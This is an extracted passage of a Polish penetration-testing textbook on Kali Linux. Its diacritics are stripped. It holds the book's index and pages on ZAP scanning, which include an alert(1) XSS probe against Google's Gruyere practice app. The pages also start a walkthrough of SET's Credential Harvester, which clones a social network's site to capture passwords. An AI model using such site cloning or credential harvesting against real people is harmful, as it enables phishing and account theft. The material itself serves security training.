internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
